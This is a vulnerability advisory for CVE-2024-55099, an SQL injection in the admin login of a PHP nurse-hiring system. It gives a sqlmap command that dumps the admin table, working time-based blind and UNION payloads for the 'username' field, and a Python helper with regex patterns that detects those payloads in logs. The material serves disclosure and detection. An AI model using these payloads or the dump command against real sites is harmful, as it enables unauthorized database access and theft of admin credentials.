Related vulnerabilities
Introduction
# CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability
+ Exploit Author: ugurkarakoc
# Vendor Homepage
+ https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql
# Software Link
+ https://phpgurukul.com/?sdm_process_download=1&download_id=17826
# Overview
+ Online-Nurse-Hiring-System-v1.0 is affected by insufficient input validation and sanitization of the 'username' parameter, which creates a SQL injection vulnerability, enabling unauthorized access to the database and compromising system security.
# Vulnerability Details
+ CVE ID: CVE-2024-55099
+ Affected Version: Online-Nurse-Hiring-System-v1.0
+ Vulnerable File: /admin/index.php
+ Parameter Name: username
+ Attack Type: Local
# References:
+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55099
+ https://nvd.nist.gov/vuln/detail/CVE-2024-55099
# Description
+ The lack of proper input validation and sanitization on the 'username' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.
# Proof of Concept (PoC)
+ `sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump`
```
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---
```
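The two payload classes in the sqlmap output above (MySQL time-based blind via SLEEP, and UNION-based extraction) are easy to spot in request logs for `/admin/index.php`. The following detection helper is an added example, not code from the advisory or from the PHPGurukul project; the sample request bodies are constructed from the advisory's own PoC output (the UNION payload is kept exactly as truncated there), and the `inputpwd`/`login` field names are those seen in the first payload.

```python
"""Flag the SQL injection payload classes reported in CVE-2024-55099
inside captured POST bodies sent to the admin login form."""
import re
from urllib.parse import parse_qs

# Indicators matching the payload types the advisory's sqlmap run found
# against the 'username' parameter, plus the quote break-out that both use.
INDICATORS = {
    "time_based_blind": re.compile(r"\bsleep\s*\(", re.I),
    "union_query": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "quote_breakout": re.compile(r"'\s*(and|or)\s+", re.I),
}


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def classify(body: str, field: str = "username") -> list:
    """Return the indicator names that fire on the given form field."""
    value = parse_form(body).get(field, "")
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def flag_requests(bodies: list) -> list:
    """Return (index, indicators) for every body that trips at least one rule."""
    hits = []
    for i, body in enumerate(bodies):
        found = classify(body)
        if found:
            hits.append((i, found))
    return hits


# Constructed sample: the two bodies from the advisory's sqlmap output
# (second one truncated as in the advisory) plus one benign login attempt.
SAMPLE_BODIES = [
    "username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=",
    "username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e",
    "username=admin&inputpwd=test&login=",
]

if __name__ == "__main__":
    for idx, names in flag_requests(SAMPLE_BODIES):
        print(f"request {idx}: {', '.join(names)}")
```

Pattern matching like this is a triage aid for log review; the actual fix for the vulnerable file is a parameterized query for the admin login lookup.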

File snapshot
[4.0K] /data/pocs/d292c2748732b764d4c60bdeb49771f8259d9229
└── [1.7K] README.md
0 directories, 1 file